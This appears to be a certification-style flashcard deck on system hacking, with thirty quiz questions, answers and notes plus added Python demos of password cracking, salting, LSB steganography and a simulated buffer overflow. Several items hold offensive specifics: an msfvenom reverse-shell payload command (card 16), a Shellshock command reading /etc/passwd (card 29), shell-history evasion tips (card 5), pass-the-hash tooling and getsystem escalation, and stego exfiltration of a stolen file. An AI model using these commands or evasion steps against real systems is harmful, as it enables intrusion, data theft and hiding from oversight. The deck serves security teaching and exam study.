Module 6 - System Hacking Flashcards

1
Q

How does an operating system protect the passwords used for account logins?

A) The operating system performs a one-way hash of the passwords.
B) The operating system encrypts the passwords, and decrypts them when needed.
C) The operating system stores all passwords in a protected segment of nonvolatile memory.
D) The operating system stores the passwords in a secret file that users cannot find.

A

A

2
Q

Which of these cracks passwords by utilizing a pre-computed table of password hashes?

A) Dictionary attack
B) Brute Force attack
C) Hybrid attack
D) Rainbow Table attack

A

D

3
Q

Which of these is a technique to use DNS to sneak data or malware past your corporate firewall, which could then be used for communication from a victim’s machine to a C&C server?

A) DNS tunneling method
B) DNS cache snooping
C) DNSSEC zone walking
D) DNS enumeration

A

A

4
Q

Consider this output from a hacker’s machine targeting another machine with the IP address of 192.168.3.10:

[ATTEMPT] target 192.168.3.10 - login "root" - pass "a" - 1 of 20
[ATTEMPT] target 192.168.3.10 - login "root" - pass "123" - 2 of 20
[ATTEMPT] target 192.168.3.10 - login "admin" - pass "a" - 3 of 20
[ATTEMPT] target 192.168.3.10 - login "admin" - pass "123" - 4 of 20
[ATTEMPT] target 192.168.3.10 - login "guest" - pass "a" - 5 of 20
[ATTEMPT] target 192.168.3.10 - login "guest" - pass "123" - 6 of 20
[ATTEMPT] target 192.168.3.10 - login "" - pass "a" - 7 of 20
[ATTEMPT] target 192.168.3.10 - login "" - pass "123" - 8 of 20

Which is most likely taking place here?

A) Ping sweep of the 192.168.3.10 network
B) Remote service brute force attempt
C) Port scan of 192.168.3.10
D) Denial of service attack on 192.168.3.10

A

B

5
Q

To attack her hapless victim, Hacker Heather had to have a terminal window open to perform her hacking. While typing at the command-line, she had to enter several of her own passwords in plaintext in order to access some of her tools. When she was done doing her dirty deeds, which file should she clean in order to clear her passwords?

A) .xsession-log
B) .bashrc
C) .bash_history
D) .profile

A

C

Note: bash keeps the commands typed in a session in memory and appends them to ~/.bash_history when the shell exits, so any password typed on the command line ends up there in plaintext. The .bashrc and .profile files are startup scripts, and .xsession-log (when it exists) only records X session output. Clearing the file after the fact is the "clearing tracks" step; an attacker who plans ahead runs unset HISTFILE or history -c so the commands are never written at all.

6
Q

Which type of rootkit sits undetected in the core of an operating system?

A) Firmware rootkit
B) Kernel rootkit
C) Hardware rootkit
D) Hypervisor rootkit

A

B

7
Q

Which password cracking technique takes the longest time and most effort?

A) Dictionary attack
B) Shoulder surfing
C) Brute force
D) Rainbow tables

A

C

8
Q

Which type of password cracking technique would feed a list of common passwords into a cracking application in an attempt to gain access to a user’s account?

A) Known plaintext
B) Brute force
C) Password spraying
D) Dictionary

A

D
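
The difference between cards 4, 7 and 8 is easiest to see by running the two attacks against a hash. This is an added example, not part of the original flashcard deck: it cracks an unsalted SHA-256 digest offline (the Hydra output in card 4 is the online equivalent, guessing against a network service one login at a time). The wordlist is constructed here as a stand-in for a file like rockyou.txt, and the brute-force alphabet is deliberately restricted to lowercase letters so it finishes quickly.

```python
import hashlib
import itertools
import string

# Constructed wordlist standing in for a real "common passwords" file.
COMMON_PASSWORDS = ["password", "123456", "qwerty", "letmein", "admin", "welcome"]


def sha256_hex(candidate: str) -> str:
    """Unsalted SHA-256, the kind of fast hash a leaked database might hold."""
    return hashlib.sha256(candidate.encode("utf-8")).hexdigest()


def dictionary_attack(target_hash: str, wordlist):
    """Try each word once, in list order. Returns (password or None, attempts)."""
    attempts = 0
    for word in wordlist:
        attempts += 1
        if sha256_hex(word) == target_hash:
            return word, attempts
    return None, attempts


def brute_force_attack(target_hash: str, alphabet=string.ascii_lowercase, max_len=3):
    """Exhaustively try every string over `alphabet` up to `max_len`, shortest first.

    The attempt count grows as len(alphabet) ** length, which is why card 7
    calls this the slowest technique."""
    attempts = 0
    for length in range(1, max_len + 1):
        for chars in itertools.product(alphabet, repeat=length):
            attempts += 1
            candidate = "".join(chars)
            if sha256_hex(candidate) == target_hash:
                return candidate, attempts
    return None, attempts


def crack(target_hash: str, wordlist=COMMON_PASSWORDS,
          alphabet=string.ascii_lowercase, max_len=3):
    """Cheap dictionary pass first, then fall back to the expensive brute force.

    Returns (method, password, total_attempts); method is None if neither works."""
    word, attempts = dictionary_attack(target_hash, wordlist)
    if word is not None:
        return "dictionary", word, attempts
    word, bf_attempts = brute_force_attack(target_hash, alphabet, max_len)
    if word is not None:
        return "brute-force", word, attempts + bf_attempts
    return None, None, attempts + bf_attempts


if __name__ == "__main__":
    # "123456" falls to the wordlist in 2 guesses; "zzz" needs the full
    # 26 + 26**2 + 26**3 = 18278 lowercase candidates; "Passw0rd!" is outside
    # both the wordlist and the alphabet, so the attack exhausts and fails.
    for secret in ("123456", "zzz", "Passw0rd!"):
        print(secret, "->", crack(sha256_hex(secret)))
```

A hybrid attack (card 2, option C) sits between the two: it takes the wordlist and applies mangling rules (append digits, swap case) before falling back to raw enumeration.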

9
Q

On a Linux system you can hide files by starting the file’s name with which of these characters?

A) Tilde (~)
B) Period (.)
C) Underscore (_)
D) Exclamation mark (!)

A

B

10
Q

Which technique provides ‘security through obscurity‘ by hiding secret messages within ordinary messages?

A) Encryption
B) RSA algorithm
C) Steganography
D) Public-Key cryptography

A

C

11
Q

Which of these programming languages is commonly vulnerable to buffer overflows?

A) C#
B) C++
C) Python
D) Java

A

B

12
Q

You breached a system and got the password hashes. You need to use these passwords to log on to systems, but you don’t have time to crack the hashes to find the passwords. Which type of attack could you use instead?

A) Pass the hash
B) Pass the ticket
C) LLMNR/NBT-NS poisoning
D) Internal monologue attack

A

A

Note: If you obtain a user's NTLM hash, you don't need to crack it to authenticate to a Windows host that accepts NTLM: the hash itself is the secret used in the challenge/response, so you transmit (pass) it in place of the password. Metasploit's exploit/windows/smb/psexec module accepts an LM:NTLM hash as SMBPass, and Impacket's psexec.py (-hashes) and Mimikatz (sekurlsa::pth) do the same. Defenses include 1) keeping hashes out of an attacker's reach (Credential Guard, no shared local-admin passwords, not logging on to untrusted hosts with privileged accounts), 2) multi-factor authentication, 3) network segmentation, and 4) preferring Kerberos and restricting NTLM where possible.

13
Q

If you boot a Windows machine with an Ubuntu Live CD, which Linux command-line tool can change user passwords and activate disabled accounts in the SAM file of the Windows machine?

A) SET
B) CHNTPW
C) Cain & Abel
D) John the Ripper

A

B

14
Q

After gaining control to a user account, how can you gain access to another user account’s confidential files and data?

A) Port scanning
B) Hacking Active Directory
C) Shoulder-surfing
D) Privilege Escalation

A

D

Note: Once you control one account, a successful privilege escalation attack lets you act with the rights of another user at the same level (horizontal escalation) or with the rights of an administrator (vertical escalation).

15
Q

As an admin, how can you protect your password files against rainbow tables?

A) Password salting
B) Use of non-dictionary words
C) All uppercase character passwords
D) Lockout accounts under brute force password cracking attempts

A

A

16
Q

Which of these is the correct syntax to use MSFvenom to create a reverse TCP shellcode exploit for Windows?

A) msfvenom -p windows/meterpreter/reverse_tcp RHOST=192.168.5.10 LPORT=3456 -f exe>shell.exe
B) msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.10 LPORT=3456 -f exe>shell.exe
C) msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.10 LPORT=3456 -f c
D) msfvenom -p windows/meterpreter/reverse_tcp RHOST=192.168.5.10 LPORT=3456 -f c

A

B

Note: A reverse_tcp payload connects back to the attacker, so the payload needs the attacker's listener address and port (LHOST and LPORT); RHOST is a target-side option for exploit modules, not a payload setting. -f exe writes a Windows executable, which is what the redirect to shell.exe expects; -f c emits the raw shellcode as a C array for embedding in your own loader.

17
Q

After gaining access to a list of logins and hashed passwords, which of these would be the fastest way to crack the passwords?

A) Collision
B) Rainbow tables
C) Decryption
D) Brute force

A

B
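
Cards 1, 2, 15 and 17 fit together: rainbow tables are fast only because the work of hashing candidate passwords is done once and reused against every unsalted hash, and a per-user salt breaks that reuse. This added example (not code from the original deck) shows both halves. The precomputed table is a plain hash-to-password dictionary rather than a true rainbow table (which compresses the same data with hash/reduce chains), and the wordlist and fixed test salts are constructed here.

```python
import hashlib
import hmac
import os

# Constructed wordlist; an attacker would precompute from millions of leaked passwords.
WORDLIST = ["password", "123456", "qwerty", "letmein", "summer2024", "admin"]


def hash_unsalted(password: str) -> str:
    """How a naive system stores passwords: one fixed digest per password."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def build_lookup_table(wordlist):
    """Precompute hash -> password once. Reusable against any unsalted database."""
    return {hash_unsalted(w): w for w in wordlist}


def lookup(table, stored_hash: str):
    """O(1) recovery of the password if its hash was precomputed."""
    return table.get(stored_hash)


def hash_salted(password: str, salt: bytes) -> str:
    """Mix a per-user random salt into the digest (sha256 kept for clarity;
    production code should use a slow KDF such as bcrypt, scrypt or Argon2)."""
    return hashlib.sha256(salt + password.encode("utf-8")).hexdigest()


def make_record(password: str, salt: bytes = None) -> str:
    """Stored form: hex(salt)$hex(digest). Salt comes from os.urandom unless supplied."""
    salt = os.urandom(16) if salt is None else salt
    return salt.hex() + "$" + hash_salted(password, salt)


def verify(record: str, password: str) -> bool:
    """Login check: re-derive with the stored salt, compare in constant time."""
    salt_hex, digest = record.split("$", 1)
    return hmac.compare_digest(hash_salted(password, bytes.fromhex(salt_hex)), digest)


def crack_salted(record: str, wordlist):
    """The salt forces the attacker to re-hash the whole wordlist for *this* record;
    nothing precomputed helps. Returns (password or None, hashes computed)."""
    salt_hex, digest = record.split("$", 1)
    salt = bytes.fromhex(salt_hex)
    for n, word in enumerate(wordlist, start=1):
        if hash_salted(word, salt) == digest:
            return word, n
    return None, len(wordlist)


if __name__ == "__main__":
    table = build_lookup_table(WORDLIST)
    print("unsalted:", lookup(table, hash_unsalted("letmein")))       # instant hit
    rec = make_record("letmein")
    print("salted lookup:", lookup(table, rec.split("$", 1)[1]))       # None
    print("salted crack:", crack_salted(rec, WORDLIST))                # still found, per record
```

The last line is the caveat card 15 leaves out: salting defeats precomputation, not weak passwords. A salted "letmein" still falls to a dictionary attack; the salt only makes the attacker pay the hashing cost again for every account, which is why salts are paired with a deliberately slow hash.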

18
Q

Which option below is the best choice to protect against privilege escalation?

A) Patch systems regularly and upgrade interactive login privileges to the system administrator level.
B) Run administrator and applications on least privileges and use a content registry for tracking.
C) Run services with least privileged accounts and implement multi-factor authentication and authorization.
D) Review user roles and administrator privileges for maximum utilization of automation services.

A

C

19
Q

Your web-page asks users to enter their mailing address, but you’re worried about possible buffer overflow attacks. Which bit of pseudo-code would correctly limit the Address1 field to 40 characters and avoid a buffer overflow?

A) if (Address1 = 40) {update field} else exit
B) if (Address1 != 40) {update field} else exit
C) if (Address1 >= 40) {update field} else exit
D) if (Address1 <= 40) {update field} else exit

A

D

20
Q

Which of these is an exploitation framework that can automate attacks on unpatched systems?

A) Nessus
B) Wireshark
C) Maltego
D) Metasploit

A

D

21
Q

Which type of password attack pulls passwords from a list of commonly used passwords until the correct password is found or the list is exhausted?

A) Man-in-the-middle attack
B) Brute-force attack
C) Dictionary attack
D) Session hijacking

A

C

22
Q

Which of these tools would NOT be used for cracking password hashes?

A) Netcat
B) John the Ripper
C) THC-Hydra
D) Hashcat

A

A

Note: Netcat reads from and writes to TCP and UDP network connections; it has nothing to do with cracking passwords. John the Ripper and Hashcat crack password hashes offline, and THC-Hydra guesses passwords online against network services (SSH, FTP, HTTP forms and so on), so the other three are all password-attack tools.

23
Q

You want to steal a file from work and send it to your home computer. If your company monitors outbound traffic, how can you transfer the file without raising any suspicion?

A) Encrypt the Sales.xls using PGP and e-mail it to your personal gmail account.
B) Package the Sales.xls using Trojan wrappers and telnet them back to your home computer.
C) You can conceal the Sales.xls database in another file like photo.jpg or other files and send it out in an innocent looking email or file transfer using Steganography techniques.
D) Change the extension of Sales.xls to sales.txt and upload them as attachment to your hotmail account.

A

C
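
Cards 10 and 23 both turn on the idea that the hidden data rides inside an innocuous file without visibly changing it. This added example (not part of the original deck) implements the simplest image steganography scheme, least-significant-bit (LSB) embedding: each bit of the payload replaces the low bit of one "pixel" byte, so no byte changes by more than 1. The carrier is a constructed byte gradient standing in for raw image data, and the 16-bit length header is an assumption of this example, not a standard format.

```python
HEADER_BYTES = 2  # 16-bit big-endian payload length stored before the payload


def capacity(carrier: bytes) -> int:
    """Payload bytes that fit: one bit per carrier byte, minus the length header."""
    return len(carrier) // 8 - HEADER_BYTES


def embed(carrier: bytes, payload: bytes) -> bytes:
    """Overwrite the least significant bit of successive carrier bytes with payload bits."""
    if len(payload) > capacity(carrier) or len(payload) > 0xFFFF:
        raise ValueError("payload does not fit in carrier")
    data = len(payload).to_bytes(HEADER_BYTES, "big") + payload
    out = bytearray(carrier)
    for i, byte in enumerate(data):
        for bit in range(8):
            pos = i * 8 + bit
            out[pos] = (out[pos] & 0xFE) | ((byte >> (7 - bit)) & 1)
    return bytes(out)


def extract(carrier: bytes) -> bytes:
    """Reassemble the LSBs; refuse lengths that cannot have come from embed()."""
    def read_byte(index: int) -> int:
        value = 0
        for bit in range(8):
            value = (value << 1) | (carrier[index * 8 + bit] & 1)
        return value

    length = int.from_bytes(bytes(read_byte(i) for i in range(HEADER_BYTES)), "big")
    if length > capacity(carrier):
        raise ValueError("carrier holds no valid payload")
    return bytes(read_byte(HEADER_BYTES + i) for i in range(length))


def max_pixel_change(original: bytes, modified: bytes) -> int:
    """How far any single byte moved; LSB embedding never exceeds 1."""
    return max(abs(a - b) for a, b in zip(original, modified))


# Constructed carrier: 1024 "pixel" bytes in a smooth gradient, standing in for image data.
CARRIER = bytes((i * 3) % 256 for i in range(1024))


if __name__ == "__main__":
    secret = b"Sales.xls: Q3 numbers"
    stego = embed(CARRIER, secret)
    print("recovered:", extract(stego))
    print("largest per-byte change:", max_pixel_change(CARRIER, stego))
```

Because the carrier keeps its size and every byte moves by at most one level, a gateway inspecting file type, size or extension sees an ordinary image; catching this needs statistical steganalysis of the LSB plane or blocking the channel outright, which is the point card 23 is making about outbound monitoring.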

24
Q

Which OS did the Shellshock vulnerability NOT directly affect?

A) Windows
B) Linux
C) OS X
D) Unix

A

A

25
Q

Which bit of pseudo-code in a programming module would limit input to less than 300 characters, and if there are 300 characters, the module should stop because it can’t hold any more data?

A) If (I > 300) then exit
B) If (I < 300) then exit
C) If (I <= 300) then exit
D) If (I >= 300) then exit

A

D
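
Cards 19 and 25 are both off-by-one questions: the field must accept exactly its declared size and reject one byte more. This added example (not from the original deck) makes the consequence concrete by simulating the memory layout in Python: a constructed record holds the 40-byte Address1 buffer immediately followed by a one-byte is_admin flag, so an unchecked copy of 41 bytes silently overwrites the flag, while the checked copy implements the "if (length <= 40) update else exit" test from card 19 and the "exit if length >= limit + 1" form from card 25. In a real C program the overwritten neighbour would be another variable, a heap header or a saved return address.

```python
BUF_LEN = 40           # Address1 field size from card 19
FLAG_OFFSET = BUF_LEN  # constructed layout: is_admin sits right after the buffer


def make_record(size: int = BUF_LEN) -> bytearray:
    """Constructed memory layout: `size`-byte buffer followed by a 1-byte is_admin flag."""
    return bytearray(size + 1)


def is_admin(rec: bytearray) -> bool:
    return rec[len(rec) - 1] != 0


def unchecked_copy(rec: bytearray, data: bytes) -> bytearray:
    """No length test, like strcpy(): bytes beyond the buffer land on whatever follows it."""
    for i, b in enumerate(data[:len(rec)]):
        rec[i] = b
    return rec


def checked_copy(rec: bytearray, data: bytes, limit: int = BUF_LEN) -> bytearray:
    """Validated path: accept up to `limit` bytes (card 19: len <= 40) and
    refuse anything longer (card 25: exit when len >= limit + 1)."""
    if len(data) > limit:
        raise ValueError(f"input of {len(data)} bytes exceeds {limit}-byte field")
    rec[:len(data)] = data
    return rec


def address_field(rec: bytearray) -> bytes:
    return bytes(rec[:len(rec) - 1]).rstrip(b"\x00")


if __name__ == "__main__":
    overflowed = unchecked_copy(make_record(), b"A" * 40 + b"\x01")
    print("unchecked copy, 41 bytes -> is_admin:", is_admin(overflowed))   # True
    safe = checked_copy(make_record(), b"A" * 40)
    print("checked copy, 40 bytes -> is_admin:", is_admin(safe))           # False
    try:
        checked_copy(make_record(), b"A" * 41)
    except ValueError as err:
        print("checked copy, 41 bytes ->", err)
```

The check alone is not the whole defence: the copy after it must use the same limit as the buffer it writes into, which is exactly what the pseudo-code options leave implicit.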

26
Q

Which of these can be probed for weakness with John the Ripper?

A) Firewall rulesets
B) Usernames
C) Passwords
D) File permissions

A

C

27
Q

Before you turn on auditing on a production server, what should you do first?

A) Perform a vulnerability scan of the system.
B) Determine the impact of enabling the audit feature.
C) Perform a cost/benefit analysis of the audit feature.
D) Allocate funds for staffing of audit log review.

A

B

28
Q

Which of these Metasploit post-exploitation modules can be used to escalate privileges on a Windows server?

A) getsystem
B) keylogrecorder
C) getuid
D) autoroute

A

A

Note: After exploiting a Windows host and getting a Meterpreter session back from the victim, the getsystem command tries several built-in privilege escalation techniques (named-pipe impersonation and token duplication) to obtain NT AUTHORITY\SYSTEM, which is a higher privilege level than a local Administrator. The same logic is also packaged as the post/windows/escalate/getsystem module.

getuid shows which user the session is currently running as. autoroute (post/windows/manage/autoroute) adds a route through the compromised host so you can pivot to other networks. keylog_recorder (post/windows/capture/keylog_recorder) captures keystrokes; it does not escalate privileges.

29
Q

Consider this command run against a Linux host:

env x='() { :;}; echo exploit' bash -c 'cat /etc/passwd'

What is this Shellshock (bash) attack attempting to do on a vulnerable host?

A) Changes all passwords in passwd
B) Display passwd content to prompt
C) Removes the passwd file
D) Add new user to the passwd file

A

B

Note: On unpatched bash, the value of the environment variable x is parsed as a function definition and the trailing echo exploit is executed as bash starts, proving that commands can be injected through the environment; the -c 'cat /etc/passwd' part then prints the password file to the prompt. Over the network the same trick works wherever attacker-controlled input is exported into bash's environment, CGI request headers being the classic case.

30
Q

Which of these would be considered “clearing tracks”?

A) An attacker gains access to a server through an exploitable vulnerability.
B) After a system is breached, a hacker creates a backdoor to allow re-entry into a system.
C) During a cyberattack, a hacker injects a rootkit into a server.
D) During a cyberattack, a hacker corrupts the event logs on all machines.

A

D